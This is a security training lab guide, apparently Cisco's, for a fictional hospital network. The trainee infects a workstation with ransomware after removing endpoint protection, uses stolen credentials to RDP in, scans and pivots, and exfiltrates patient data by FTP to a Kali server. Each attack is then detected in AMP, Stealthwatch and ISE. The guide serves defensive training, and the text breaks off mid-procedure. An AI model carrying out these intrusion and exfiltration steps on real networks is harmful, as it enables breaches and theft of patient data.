1	Now let’s see what Cisco AMP saved us from by removing Cisco AMP and infecting the host with Ransomware. We can install AMP after, but the damage will already be done since this is a public private key / asymmetric based ransomware. The point for this part of the lab is to learn how real ransomware functions as well as better understand what AMP was looking at and prevented in the previous attempted exploit.
2	Remote desktop back to the Dr. Workstation from the jumphost.
3	Click the All Programs button and choose the Control Panel. Make sure you are using the Dr.’s Programs button and not the Jumphost!
4	Click Programs and Features.
5	Double-click Cisco AMP for Endpoints Connect to uninstall it.
6	Wait a few minutes for the installation to complete. When it completes, you are ready to go through the infection process again.
7	On your desktop, click the Microsoft Outlook icon to pen Outlook.
8	Open outlook by clicking the desktop icon as shown from the dr.’s workstation.
9	You should see the fake email in Dr. Howser inbox from the previous attack. Click the email again and open the attachment.
10	Microsoft Word will now start up. In the Microsoft Word document, you will be asked to “Enable Editing” in the Protected View yellow ribbon bar. Click Enable Editing button then from the Security Warning click the “Enable Content” button.
11	Once the file is executed, the Phishing Document will tell you to enable macros. Click Enable Content. Note: The command-line window will open behind the outlook client. Real malicious software would run in the background to avoid things like this since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would hide and attempt to spread at this point also.
12	The command-line window may open behind the outlook client.
13	Close the Microsoft Word application completely.
14	If you receive an error about spoolsvc.exe not starting, ignore it.Click Close the Program. Now is a GREAT time to take a break, as you will need to wait about 5 minutes before the ransomware messages automatically start to pop-up on Dr. Howser’s computer. Wait until you see the following examples of the successful ransomware infection show up on the Dr. Workstation before proceeding to the next step. At this point, you have played out the role as the victim and had your system infected with ransomware.

Incident Response: Post Infection

Now that your Dr’s computer is infected with Ransomware, let’s pretend you are performing an incident response to the situation. You now need to install Cisco AMP. You cannot remediate the damage that has already occurred. This version of ransomware uses asymmetric / public key encryption. The attacker has the private key required to unencrypt the victim’s files. AMP can prevent the spread of the infected and kill any future exploitation; however, encrypted files are a lost cause at this point.

Procedure

1	Repeat the process of accessing Cisco AMP, Clicking Management -> Download Connector, Choosing Protect and copying the URL. Go to the Dr.’s workstation, open a web browser and paste the connector link so you once again download AMP. Install AMP but make sure it’s the new connector you just downloaded and not the older link. You will see older files are encrypted by the ransomware.
2	Click Management > Computers to go back to the Cisco AMP dashboard on the Jumphost and confirm you are managing the system.
3	Go back to the Dr. Computer and open the malicious document again. This will allow AMP to collect more information about the ransomware.
4	Once you open the ransomware again, go back to the jumphost, access Cisco AMP and click the Dashboard tab to bring up an overview of what is going on.
5	Scroll down to find interesting malicious artifacts that were collected by Cisco AMP. This data is different from our example before, because the Ransomware has already downloaded its payload to the system. Note the importance of Retrospective Security--the ability to see what is running so you can better understand the damage that has been done to an infected system. The last time you infected the system during this lab was when Cisco AMP was installed. These artifacts were not installed and running at that time. This means we are looking at a different investigation since this is a response to a successful exploit rather than reviewing what was prevented.
6	To see options for your investigation, click an artifact. For our example, click the VirusTotal link to confirm this is the TelsaCryp Ransomware.
7	Go back to AMP. Scroll up and choose Analysis and Events. Here you will see there are a few things executing due to this infection. First there is a 77c8.exe file, which has been labeled as TelsaCrypt Ransomware. But wait, there is more! There is a PowerShellEmpire part to this attack that is running? Also, what is this spoolsv.eve file?

Summary

It looks like the Ransomware is a smoke screen and/or distractor for some other attack! Thankfully, you have tools like Cisco AMP to identify what is really going on.

Congratulations! You have now completed Scenario 4.

Insider Threats: Move Within to Obtain and Export Your Data

Value Proposition: Perimeter security is not 100% meaning eventually a malicious entity will breach your network. The step that typically follows a breach is establishing a foothold inside a target’s network. Once attackers are inside a network either through malicious software or through a remote connection, they will need to understand the internal environment. This is typically accomplished through scanning the environment. Once internal targets are identified, attackers will attempt to access other systems, also known as pivoting. The goal is typically to identify systems of interest so they can obtain something of value. This process has been documented and modeled as the Attacker Kill Chain.

In this scenario, Mr. Green has sold login credentials stolen from an administrator for the workstation on wheels (WoW) located within HackMDs.com’s headquarters to Mr. Black. This permits Mr. Black to be able to connect into the HackMDs network as an authorized user. This is just one example of the many real-world methods attackers can obtain a foothold inside your network!

Mr. Black doesn’t want to get his own hands dirty, so he has contracted Mr. Brown (you) to use the stolen credentials to access HackMDs and steal sensitive patient records. Mr. Brown’s objective is to access the WoW system and move to other systems or pivot to identify a method to gain access to systems that contain sensitive data. When Mr. Brown can access sensitive data, his final goal will be to export the data off the network to a remote cloud storage server. He will later provide access to the cloud server to Mr. Black so Mr. Black can sell the stolen data on the dark web.

Outcome

At the end of this scenario, you will have a basic understanding of what attackers do once they breach a network. You will have accessed a network and performed internal reconnaissance to identify how the internal network looks like for HackMDs.com. It is important to be aware that real attackers will use a stealthier approach to performing reconnaissance to avoid being detected however, we have removed those requirements due to the short time provided for this lab.

Once you learned the network, you will have connected to internal systems containing HIPAA data and perform data exfiltration representing the goal of many cyber breaches. Once again, real world attackers would use stealthier methods to hide the data exfiltration actions however, we have simplified this process for this lab scenario. It is also important to point out that if security measures are not implemented to detect insider threats, detecting and preventing Mr. Brown would fail regardless of the amount of stealth used by the attacker!

Once you finished exporting the stolen data, you will switch to the defender camp with the goal of detecting and preventing Mr. Brown from stealing the valuable data. You will have a basic understanding of how Cisco Stealthwatch can detect insider threats using NetFlow to identify unusual behavior as well as malicious actions within the network. You will also have briefly covered how Cisco Identity Services Engine (ISE) can also quarantine any threats that Stealthwatch deemed as a high concern using the Stealthwatch concern index (CI) value and Stealthwatch ISE integration. In this scenario, we will not remediate the insider threat since that is the focus of the next scenario. Know that the same remediation capabilities used between Cisco Firepower and ISE covered in scenario 6 could also be setup between Cisco Stealthwatch and ISE. For more details on remediating insider threats, see scenario 6.

Lab Resources

Attacker Resource 1: Kali Linux server sitting outside HackMDs network
Attacker Resource 2: Accessing Workstation on Wheels (WoW) inside HackMDs network with stolen login credentials.

Note: Angry IP scanner is pre-installed on the WoW representing one of the many potential toolkits attackers would put on a compromised system.

Target Resource 1: Workstation on Wheels (WoW)
Target Resource 2: Dr. PC running Windows 7

Note: FileZilla is pre-installed on the admin system representing one of the many potential data exfiltration toolkits attackers would put on a compromised system.

Defender Resource 1: Cisco Stealthwatch Management Console
Defender Resource 2: Cisco Identity Services Engine
Defender Resource 3: Any network device with NetFlow and 802.1x enabled

Defending Insider Threats with Flow

NetFlow or network flow is a feature introduced by Cisco routers giving administrators the ability to collect IP network traffic as it enters or exits an interface. By analyzing the data provided by NetFlow, an administrator can determine things such as source and destination of traffic, class of service and causes of congestion. The key to NetFlow is it can exist on common network equipment such as routers, switches, wireless access points, virtual networks (IE inside the data center) and so on.

Further developments in harvesting flow have led to using NetFlow for security analytics. Technology such as Cisco Stealthwatch can determine potential threats based on behavior and network triggers meaning security value is achieved without signatures as well as constantly self-tuning as more NetFlow data is analyzed. By harvesting NetFlow for security, every network point becomes a security sensor looking for suspicious NetFlow trends.

It is important to note that all network equipment does not support NetFlow however, Cisco Stealthwatch Sensors can be used to convert raw data to NetFlow for those use cases.

Note: All flow types are not equal! sFlow (Sampled Flow), as an example, provides far less details about potential threats than NetFlow version 9. Cisco Stealthwatch accepts most forms of NetFlow and IPFIX. Cisco defined and created the NetFlow standard and it was several years and several different iterations before standards-based NetFlow was ratified by the IETF (IPFIX).

In this attack scenario, Mr. Brown (you) will use the stolen credentials to access the WoW computer located within the HackMDs network. You will open a pre-installed network scanner on the WoW computer and perform reconnaissance within the network perimeter to map the rest of the internal network. You will identify devices within the sensitive network and choose a target to pivot to. Once you have connected to a server within the sensitive environment, you will seek out HIPAA related data and export it using a pre-installed FTP service.

Note: Real attackers will spend long periods of time (months or even years) slowing pivoting and exporting data. This scenario will perform these steps quickly as stealth isn’t a major concern. Regardless, we have seen real world environments lacking internal defenses and therefor would not see this attack if it occurred within their environment!

Username for access the Kali Linux attack server is root, and the password is C1sco12345.

The stolen username for the WoW (Workstation on Wheels) system is dhowser and password is C1sco12345.

Once you complete Mr. Brown’s mission, you will move to the defender side by accessing the insider SOC Jumphost. You will access the Stealthwatch Management Console (SMC) and look for the top threats, which will be the footprint of Mr. Brown’s actions. You will identify why Mr. Brown’s actions are true indications of compromise and cover how ISE can quarantine alarms from Stealthwatch due to a high concern index alarm. You will not perform remediation as that concept is the focus for scenario 6.

Username for Cisco Stealthwatch Management Console (SMC) is admin, and the password is C1sco12345.

Connect to HackMDs

Mr. Brown, aka YOU, are currently outside of the HackMDs network. Mr. Black recently gave you stolen login credentials to an internal system so you can bypass HackMDs’ perimeter security. You have identified the outside IP address of the WoW (198.19.30.100) during the reconnaissance you performed in Scenario 3. Let’s access that system now from the Kali Attack server.

Procedure

1	Connect to the Kali Linux server.
2	Start a terminal session by clicking on the terminal emulator icon at the bottom of the Kali Linux desktop.
3	Type `service vsftpd start` to start the Kali Linux FTP server that will be used to receive the data you are about to steal from HackMDs’ network. If you don’t do this, you may not be able to execute the FTP connection back to the Kali Linux system once you are inside the network and looking to export data. Note: Remember Linux commands are case sensitive. If available, use the tab key to auto complete commands when you can.
4	We are now going to remote desktop over to the WoW computer. You may believe these servers would never be exposed online, however according to the following screenshot, this is an example from the Shodan website of how many IP addresses have this particular service exposed to the internet. Feel free to search Shodan yourself!
5	This is sometimes done to provide for Remote Access and facilitate remote work. This is not however a secure method to connect and should be potentially avoided.
6	From the Kali Linux terminal session, Remote Desktop to the WoW system using the command `rdesktop -z -P -xm -k en-us 198.19.30.100:3389`
7	You will see WOW2\root as the login. Change it to your known stolen credentials which are Dr. Howser, dhowser and password C1sco12345. Note: You will not be able to make a “\,” so just edit around it. Now you are on the WoW computer meaning you are inside the HackMDs network!

Internal Port Scanning

Now that you are inside the HackMDs network, it is time to search inside this network for systems with data. We will perform some reconnaissance using the Angry IP scanner that Mr. Brown installed as part of his attack arsenal once he breached the network.

Note: We installed this for you to save time. Real attackers will do similar things by installing tools on compromised systems

Procedure

1	Double-click the icon labeled Angry IP Scanner.
2	This will bring up the Angry IP scanner GUI. Change the IP Range from 198.19.10.0 to `198.19.10.255`, and then click Start. Note: If you are prompted to download a newer version, choose to ignore and proceed.
3	When the scan completes, you will notice a few IP addresses were found with their corresponding hostname. Click “Close” button and then scroll through the list of IP addresses found by Angry IP Scanner. Note: The number of IP Addresses and your exact output from Angry IP Scanner might vary. You may want to run it a few times to ensure you generate lots of events to hunt for later in this lab.
4	Scroll down to the IP address 198.19.10.101 that looks interesting. This could be the Dr. Howser’s workstation or something with similar value based on the hostname. This is likely going to contain sensitive data with value or give us access to other systems that have valuable data. You were told all workstations at HackMDs used by doctors have the same administration level password so next we will try pivoting to this system.

Pivoting

Procedure

1	Reconnaissance has rewarded Mr. Brown with a few systems that look to contain confidential and sensitive data. One is the WoW (198.19.30.100) and the other is Dr. Howser’s system (198.19.10.101). Connect to the doctor’s system located at 198.19.10.101.
2	From the WoW desktop, click the Remote Desktop icon on the desktop or click the start button and type `remote desktop` to bring up the remote desktop application in windows.
3	Type the IP address of `198.19.10.101` and click connect.
4	Log in with `dhowser` with the password of `C1sco12345` then click OK. If you see a security prompt about the remote computer certificate cannot be verified, click Yes to continue on. Now you will be inside Dr. Howser’s system. You should also see a file called HIPAA_Data.mp4 on the desktop as shown in the example below. This is the confidential and sensitive data that you are after and will be exfiltrated back to your remote server. Yes, this is very basic, however real-world attacks involves not only finding the data files but then extracting them off the breached network. We are just simplifying the process in this lab example. Note: We are using the HIPPA_Data.mp4 file so that the file is large enough to trigger a Cisco Stealthwatch data loss Host Lock Alarm. Host Lock Alarms are a common best practice when deploying Stealthwatch to monitor sensitive networks.

Data Exfiltration

Mr. Brown has found valuable data on an administrator’s system within HackMDs.com. Now it is time for you to exfiltrate those files to your remote server. Then, Mr. Black will post them to the dark web for sale. This can be accomplished using many tactics, however in our lab, we will use a standard FTP application to exfiltrate this data. For this, we will use FileZilla FTP client. Let’s assume Mr. Brown has already downloaded and installed the FileZilla FTD client program, even though there are many more stealthier methods to exfiltrate files from remote networks.

Note: If a new version is offered of FileZilla, just cancel and ignore it. We don’t need anything special here.

Procedure

1	From Dr. Howser remote desktop session, double click the FileZilla icon.
2	This will bring up the FileZilla GUI. Type the Kali Linux IP address `198.18.133.6` for host, user is hacker, password is `C1sco12345` and port is 21 and then click the Quickconnect button to start the FTP session. You should now see the folder home/hacker appear to the right under Remote site. Note: If you get an error about supporting unencrypted traffic, click OK.. Note: You may already see the file there, which is OK. Go ahead and replace the file. We want to perform this malicious action so later we can see it in Stealthwatch. The FTP GUI may be squished. You can expand it by dragging the bar under a window to make it easier to see the HIPAA_data file.
3	On the left window, browse to the desktop and drag the HIPAA_Data.mp4 file to the hacker folder located on the Kali Linux attack server. It may be encrypted if you performed the Ransomware lab prior to this lab. That’s ok.

Defending HackMDs with Stealthwatch

You have accomplished your mission as the attacker. You accessed the HackMDs network remotely using stolen credentials, found an internal system and pivoted to that system. You identified HIPAA data and exported it to your external attack server using FTP. That data can now be sold by Mr. Black on the open market.

Now, it is time to switch to the defender side and implement incident response steps to identify and eventually prevent Mr. Brown from stealing sensitive data. It is important to understand that once the defending team remediates the breach by Mr. Brown, they will need to look for other breaches and attempt to understand how Mr. Brown got in. With a little research, they should be able to identify how the system was accessed and issue a network wide password reset to void any other stolen credentials Mr. Green or others may have access to.

In this exercise, you will start off by monitoring the Internal HackMDs network for potential breaches using Stealthwatch. Mr. Browns scanning should have set off reconnaissance alarms since that is not common behavior for internal users. Stealthwatch is also configured to monitor the .10 network as a “sensitive subnet” known for hosting HIPAA and other sensitive related data. Mr. Brown’s connection from the Kali server to the inside devices and then from those inside devices to the Dr. workstation found on the sensitive .10 network will trigger alarms including unauthorized services such remote desktop connections as well as FTP.

Note: Identity Services Engine (ISE) can be setup to receive any high concern alarms from Stealthwatch and auto quarantine any identified threats. We will not showcase that in this scenario since it is the focus of scenario 6.

Procedure

1	If needed, connect back to the Jumphost using the username administrator and password `C1sco12345`.
2	In the web browser find the SMC tab, or use the browser bar to access the ‘Stealthwatch Management Console’ found by going to https://198.19.10.6. Log in with the username of admin and password `C1sco12345`. You should now see the main Stealthwatch Management Console (SMC) dashboard. This dashboard shows the alarm highlights, these are the top security events you should be evaluating. This network data comes from any device that generates NetFlow (routers, switches, virtual network devices, security appliances, wireless devices, etc.)
3	Click the Recon alarm number. Explore the Security Insight Dashboard.
4	This will bring up a list of recent recon activity. We can see there has been scans from 198.19.30.100 indicating this system has been breached and is searching for new systems to pivot too. Click the IP address link associated with the IP address identified (not the circle icon). This will bring up a list of recent malicious activity such as the recent recon associated to this IP address. We can also see additional information including the Host Summary, Traffic by Peer Host Group, Alarms by Type, Users & Sessions and Application Traffic for both Internal and External traffic.
5	Scroll over to the Alarms by Type bar graph to show the various types of alarms triggered by this host. You can clearly see the Recon and Ping_Scan behavior. If you click one of the bars such as the Ping_Scan, you will see a specific screen showing details about that alarm. Let’s click the Ping_Scan bar to see those details. The color may be different so use the color key to make sure you select Ping_Scan.
6	The Alarms by Type shows a 198.19.30.100 has scanned the HIPAA subnet represented by 198.19.10.0/24 via user dhowser. Click the view details to see what this activity is all about.
7	Click View Details to bring up the “concern index” this represents and the type of security event, which is a Ping_Scan. The concern is extremely high … probably in the thousands meaning this is part of a really bad event. You can see the details of this event by clicking the carrot next to the “Ping_Scan”, which explains what the activity is all about. The next step for our investigation should be to see if we have any activity within that .10 environment since it may have compromised due to this scanning activity we are investigating.
8	Click Dashboard and select Network Security to return back to the main dashboard.
9	Now let’s look at the top alarm widget to see if any devices on the .10 network have shown any behavior of concern. At first, you may see a few systems have been scanned shown as RC (recon). You may also see a PV policy violation for the 198.19.10.3 system representing unwanted activity within this network. After 3-5 minutes, you should see the IP 198.19.10.101 pop up with an EX (exfiltration) alarm! You will need to look into that! Click the 198.19.10.101 to see more details on this system. Make sure to click the actual IP address and not EX icon. You can also click the Exfiltration module at the top under the Alarming Hosts section to find the latest systems performing data exfiltration. This will bring up a screen focusing on this particular system that generated the EX alarm. You can see a Peer Host Group mapping representing this server containing HIPAA data has connected to a host on the outside network and an unknown person. This would be REALLY bad. Scroll down and you can view application layer data including Remote Desktop communication. This shows a laptop within the HIPAA network is being remotely accessed. That’s bad! You are able to remove this user by clicking the Quarantine link. Don’t do that as we will be showcasing ISE remediation in the next scenario. You can view this quarantine button under the user Host Summary. If you do click it, it will perform a similar quarantine as what we do in the next module. Know that a quarantine in ISE can mean whatever you configure it to do. Any of these events would be a cause for major concern. The combination of these activities would cause a high Concern Index(CI) that could be automatically notified to other systems, such as the Cisco Identity Services Engine (ISE) for auto remediation and/or quarantine. The Stealthwatch GUI shows a lot of data however, with the additional of the Stealthwatch java application, you can see even more details on security and network events. Feel free to explore The Stealthwatch java application in the advanced lab. Note: Events found in Stealthwatch can be acted on using automated integration with tools like Cisco ISE. Later in this demo, you will showcase this concept by automatically removing threats found by Cisco Firepower by connecting to the Cisco ISE server using pxGrid communications. The same exact configuration that can be setup between Cisco Stealthwatch and Cisco ISE can also be setup with other pxGrid enabled remediation tools.

Advanced Bonus Lab - Defending HackMDs with Stealthwatch [Advanced]

Procedure

1	Connect to the Jumphost.
2	Click the icon on the desktop that states to launch the SMC. Note: If you receive a warning to update the Java application, say Later and continue.
3	Log in to the Stealthwatch management console using the username admin,password C1sco12345 and enter the SMC IP address `198.19.10.6`.
4	You should now see the main Stealthwatch Management Console (SMC) dashboard. On the left is a list of network devices feeding NetFlow to the Stealthwatch Collector, as well as the Stealthwatch Sensor that turns raw traffic into NetFlow. You can see the additional list of devices by clicking on the + button next to each section to expand the list.
5	The forms that are present on the right of the screen represents two main tabs. The first is “SOC – Traffic – Patient Data” and other is “Cyber Threats”. Cyber Threats is a dashboard monitoring the entire network. Whereas the SOC – Traffic – Patient Data is a dashboard only monitoring the sensitive network containing HIPAA data. This makes the admin’s focus much easier for viewing different networks with different priorities to the business. Click the SOC – Traffic – Patient Data tab so we can focus there. We start here because the GUI showed a major concern regarding the 198.19.10.101 performing data exfiltration.
6	After clicking the SOC – Traffic – Patient Data tab, click the Alarm Summary tab to view the current security alarms within the SOC focused part of the network (i.e., where the HIPAA systems are located). You should see similar data to what was found in the GUI. In this example, we can see 198.19.10.101 shows data exfiltration. Let’s double-click the 198.19.10.101 address to see more details about this.
7	You can see different tabs that provide details about this host IP address. This “Top Active Flows”, shows the host 198.18.133.6 (outside attacker) the inside 198.19.10.101 HIPAA host using FTP connection over port 3389. This means somebody used FTP to pull data the HackMDs internal sensitive network!
8	Click the Security Events (not Security) tab. This shows an IP address outside of the HackMDS network is the one behind the RDP connection. In this example, 198.19.30.100 was used by 198.18.133.6 to access the 198.19.10.101 system. We can also see FileZilla was used as well as host lock violations triggered around the 198.19.30.100 and 198.18.133.6 addresss. Host lock violations could trigger a quarantine if a tool such as Cisco ISE was configured to do so, which would have prevented this event from occuring!
9	NetFlow doesn’t lie! To see the user account behind this behavior, click the Identity, DHCP & Host Notes tabs to see the username is dhowser.
10	Go back to the SOC – Traffic – Patient Data tab window, then click the Recon tab to show the scanning activity you created as Mr. Brown. It would be concerning to level of port scanning happening within the HIPAA network.
11	Click the Security tab and you will see the same 198.19.10.3 device within the HIPAA network has been associated with scans. Clicking the Host Locking tab will show remote desktop (RDP) violations have occurred.
12	Let’s go back to the SOC – Traffic – Patient Data tab and look at the Alarm summary again. This time click Suspect Data Loss. Note that the color may be different than our example in the pie chart.
13	This will bring up data identified as leaving our HIPAA network. You can see the user involved is dhowser.
14	To view details on this data loss event, right-click the IP address for dhowser’s computer aka the 198.19.10.101 IP address and select Peer vs Port. This will bring up a visual of what’s going on.
15	This gives a simple view of the situation. Here you can clearly see a large amount of data has left the HIPAA network to some outside IP address 198.18.133.6. This would be a very impactful diagram to show to anybody concerned about data leaving the HIPAA environment!
16	Finally, we can view the overall network view of the HIPAA environment by clicking the SOC – Traffic – Patient Data and selecting the Network tab. Here, we can see a few protocols and activity that should be a concern from this type of environment. We can see both FTP and RDP traffic, which should raise alarms! Note the colors may be different in the chart. At this point, you have identified the breach using various techniques. With Identity Services Engine, you could have any high concern index systems quarantined automatically, while they are investigated. We didn’t do that in this scenario since that is the focus of the next scenario. The key to this situation is that Stealthwatch was able to let the HackMDs administration know they has been a breach based on the reconnaissance activity, pivoting, connection to the HIPAA sensitive system network, FTP services being unauthorized and finally, data being exfiltrated to the outside network. Traditional security technologies like Firewalls, IPS and Anti-Virus would most likely miss this attack. Only a behavior-based technology could catch a true insider threat such as the one we just dealt with. Fortunately for HackMDs, their network (Switches) was able to detect this threat using NetFlow security technology. This approach breaks down all the different type of network traffic seen within the classified network. Here you can see there was unauthorized FTP traffic outside of this environment, unauthorized RDP traffic within the environment and the hosts involved with these obvious bad actions. This dashboard would be a simple way to glance at the traffic and figure out there is a big problem! Congratulations! You have now completed this scenario.

Compromised Hosts: Control Access and Monitor Malicious Threats

Value Proposition: It is critical that you know who and what can access your network. It is also critical to automatically enforce proper policy. This includes all aspects of network access meaning LAN, Wireless and VPN from guests to the CEO. Gaps in coverage expose you to the risk of having a system bypass your perimeter security with direct access to network resources.

Best practice is having policy enforcement happen upon connection meaning provisioning only the necessary network services based on the device connecting and its current posture state. The industry calls this provisioning least privilege access rights. The term “Posture” means validating if a device is a high risk by not having the latest updates, anti-virus and so on, which such checks are configurable by the organization.

Access control as a technology faces numerous challenges, one of which is that devices once let on, are not observed in what they do or what they are (example IoT device). In many cases, access control is equivalent to the door man or bouncer at a nightclub. Gaps left with access control can be overcome with breach technologies. Some of these technologies are Intrusion Detect and Prevention Systems (IPS or IDS). Other examples of breach detection use anomaly detection capabilities. Flow-based anomaly detection systems have the advantage of being able to be placed pervasively throughout the network. This scenario will show case this concept in full action!

In this scenario, a HackMDs user’s laptop has been compromised by Mr. White and will be used as a proxy point to get into the network. The inside attacker we are calling Mr. Red will connect over VPN representing a remote user connecting back to the corporate network without knowing they are compromised.

Mr. White (you) will use that trusted remotely connected asset as a proxy point to get internal access to the HackMDs network. Mr. White will need to download a payload that will install software needed to obtain keyboard access to the infected system and will attempt to scan for other devices to establish a foothold within the HackMDs environment. Both the download of the malicious file and internal reconnaissance activity will trigger critical Cisco Firepower alarms that will in turn inform Cisco Identity Services Engine to quarantine the endpoint seen as an internal threat.

Outcome

At the end of this scenario, you will have a basic understanding of how access control and internal security solutions can work together to prevent real world cyber threats. You will access the HackMDs network over VPN however, the same policy could be enforced for LAN and Wireless connections. HackMDs will have Cisco Firepower IPS monitoring the internal network for threats, which you will trigger by connecting to the HIPAA network and performing malicious actions. These actions will cause Firepower to inform Cisco Identity Services Engine (ISE) that the user associated with the violations needs to be quarantined.

On the defender side, you will explore Cisco Firepower and Cisco Identity Services Engine (ISE) to validate the access policy for HackMDS has prevented the threat.

You will be the attacker abusing a compromised system. You will be the defender preventing Mr. Black from accessing the HIPAA network!

Lab Resources

Attacker Resource 1: Compromised Windows laptop used to access HackMDs
Target Resource 1: Hosts such as a Doctor’s workstation (198.19.10.101) on the HIPAA network
Defender Resource 1: Cisco Identity Services Engine
Defender Resource 2: Cisco Firepower
Defender Resource 3: Cisco Umbrella roaming client on Cisco AnyConnect
Defender Resource 4: The network using 802.1x for enforcing access control

Deploying 802.1x for Access Control

Note: EasyConnect provides port-based authentication. EasyConnect is like 802.1X, but it is easier to implement. EasyConnect learns about the authentication from Active Directory and provides session-tracking for active network sessions. Session Directory notifications can be published with PxGrid.

In this attack scenario, a compromised host tagged as Mr. Red will give Mr. White (you) access to the HackMDs internal network. You will simulate the compromised host connecting back to the HackMDs network by enabling a Cisco AnyConnect VPN connection, as many remote workers would do. Once inside the network, you will attempt to identify other devices on the same network using port scanning behavior. This action will trigger a Firepower IPS alarm that is monitoring for unauthorized behavior within the HIPAA network. The result will be an alarm in Firepower sent to Cisco ISE to have the system bounced from the VPN network. You will find that the remote user has been placed in a quarantined policy. You will click a link to remove that system from the quarantine policy and attempt to download the malicious payload, which represents another type of post compromise behavior. This will once again cause the remote system to be place into the quarantine network.

As a defender, you will access the Firepower system to identify the threat and learn how Firepower could identify this type of insider behavior. You will also log into the Cisco ISE and validate the details behind the system Firepower had told ISE to remove from the network.

Note: There are more versions of Cisco security solution integrations. Cisco ISE is built to be the context provider (which tells solutions more about an IP such as what it is, where it is and so on) and bouncer when another solution identifies a system is a threat to the environment. Other solutions that could leverage ISE are SIEMs such as Splunk, vulnerability scanners such as Rapid7’s InsightVM, or other Cisco technologies such as Stealthwatch. You will find these integrations within the CDC environment.

Username to access the compromised host is admin, and the password is C1sco12345.
Username for Cisco Firepower is admin, and the password is C1sco12345.
Username for Cisco ISE is admin, and the password is C1sco12345.

Connect to the compromised system

Note: It is important that you complete the connectivity scenario prior to starting this part of the lab to ensure PxGrid is established between Cisco ISE and Firepower.

Procedure

1	Connect to the Jumphost.
2	Double-click the Contractor RDP icon to access the contractor’s laptop that represents the compromised laptop. Note: To keep the lab consistent, you are starting on the Jumphost and remotely accessing the compromised system. This is a pre-step meaning the actual story starts when you are at the compromised system.
3	This will prompt you to log in as dhowser. Type the password `C1sco12345`.
4	You will have the option to choose the admin or contractor. Select the dhowser as your login. Now you are connected to the contractor dhowser laptop.

Connect to HackMDs over VPN

At this point, you should be using the compromised laptop. You need to establish a VPN connection that represents a remote user who is infected with malware connecting back to the corporate network.

Procedure

1	Click the Cisco AnyConnect icon and select connect. In a moment, the VPN connection will be established.
2	When you are asked to accept the certificate, click Connect Anyway. You should see the VPN is connected. Observe that Cisco Anyconnect offers a lot more capabilities than traditional VPN. Capabilities are enabled as cloud based services or integrations with Cisco technologies. There are a few features we have enabled in this lab. First, we have Cisco ISE looking for a hidden file meaning Cisco AnyConnect is acting as the ISE posture agent. This represents the requirement to validate a computer is a corporate issued device rather than personal device. Employees may know the login information but they will also need the hidden file in order to pass the system scan. The system scan can also scan for anything including if updates are installed, if antivirus is running, look for hidden certificates or pretty much anything. Notice that another capability we have enabled for this lab is Cisco Umbrella. Umbrella provides a cloud-based firewall called the Secuirty Internet Gateway (SIG) with web filtering and reputaiton security. The SIG enables Security to follow the user anywhere they travel in the world. This is ideal for ensuring HackMDS’s policies are enforced, regardless of how the device connects to the network. Below is a high-level summary of the types of capabilites and integrations avilable with Cisco AnyConnect. At this point, you are on the standard employee network and have passed all requirements to be given access. Note: This network does not have segmentation set up that would prevent a user from directly communicating to the HIPAA network. In the real world, network isolation would be used to ensure untrusted devices can’t access trusted devices. Because of time constraints for lab development, network segmentation practices were not built in that would require more steps to bypass.
3	Let’s view your status in Cisco ISE as the HackMDs SOC administrator. Switch back to the Jumphost by reducing the RDP screen that has you currently logged into the Contractor system. Log in to Cisco ISE using admin for the username and C1sco12345 as the password.
4	Click the three bars at the top left corner.
5	Click Operations > RADIUS > Live Logs. This will bring up the live status of anything connect to the network. For this lab, you should see dhowser is connected to the network. His system has been scanned and shows complaint. If you don't see any connection status, you have not had your contractor VPN into the network. This section shows "live" connections. Some labs start up with dhowser in the quarantine state. Check to see if that is the case for your lab. If your contract is in a Quarantine state, you will need to fix this.

Break Policy Over VPN - Part 1: Reconnaissance

In Part 1 of this scenario, you are playing the role of a trusted contractor connecting to the inside HackMDs network. It is common for malware or insider threats to perform reconnaissance when they breach a network, to better understand the environment. To simulate this behavior, you will perform internal network scans.

HackMDs has an internal IDS (Cisco Firepower) that is monitoring this type of behavior. If scanning has occurred, the IDS will tell Cisco ISE to move the system causing the violation to the quarantine network. This automated response is accomplished through the integration of Cisco Firepower and Cisco ISE using PXGrid.

Procedure

1	Let’s go back to the contractor workstation by opening the RDP session you have open. Now that you are on the network as a trusted remote access user, let’s represent a malicious activity by running the Zenmap scanner. This type of behavior is what a typically malicious user or software would do once it breaches the network meaning the goal is to discover the network that has just been compromised. The security industry calls this reconnaissance, which is a common first step to follow a network breach.
2	Double-click the Zenmap scanner icon.
3	Set the Zenmap Scanner to scan the HIPAA .10 network using the range 198.19.10.0 to 198.19.10.255 or 198.19.10.0/24. Click Scan to start scanning this network. You should see the VNP connection becomes broken due to a policy violation caused by the port scanning IE network reconnaissance. This happened due to Firepower identifying the threat (unclassified system pinging a system on the HIPAA network) and an alert sent to Cisco ISE informing that the system should be kicked off the VPN. You will see the Cisco AnyConnect VPN client pop up showing you have been kicked off.
4	Let’s validate the incident has occurred. Go back to the Jump host by reducing the Contractor remote desktop session and access into the Cisco ISE dashboard.
5	Click the three bars. Under Radius, choose Operations > Live Logs.
6	You should see dhowser is now in the Quarantine state.

Remediate the VPN User

Now, we need to move our user back to a safe state. To do this, we can push patches, forcing host antivirus to update, performing a vulnerability scan or pretty much anything you would need to do to bring a system back to a safe state. For this lab, we will have the user access a website that is designed to “fix” them meaning we are pretending it’s a host management tool that would evaluate and patch them.

Procedure

1	Go back to the Contractor system by opening the remote desktop session. Note: If you found yourself in the Quarantine state at any point in this lab, use this section to move Dr. Howser back to the Permit Access + Scan state When you are in the Contractor system, reconnect to the VPN. You will be connected as a Quarantined user.
2	To move yourself back to the unquarantied state, first open the Chrome browser.
3	Click Remediation Page! This is our simluated patch server. You will see the Snort logo. This represents the fact that you have been remediated. This action also kicks you off VPN and moves you back to the Permit Access + Scan state.
4	Close the Remediation Page, and then reconnect to the VPN.
5	Go back to the jumphost. Click the three lines at the top left.
6	Click Operations and select Live Logs. You should see Dr. Howser is back in the Permit Access + Scan state.

Break Policy over VPN - Part 2: Download Malware

We will again violate policy by acting as if we are a compromised host. This time we will mimic downloading malware to a host. This is a common tactic used by attackers is to download malicious software in pieces with the hope of bypassing signature-based technology such as anti-virus. Once assembled, the malicious software could represent anything from ransomware to remote-access tool kits designed to establish persistent access to the target network. For this lab, we will use a gateway malware detection capability within Cisco Firepower to evaluate and detect malicious files. If a malicous file is detected, Cisco Firepower will alert Cisco ISE to quarantine the associated system.

Note: Detecting downloading behavior could be accomplished by looking for various indicators such as where downloads are coming from, how the data is being downloaded and who is making the request.

Procedure

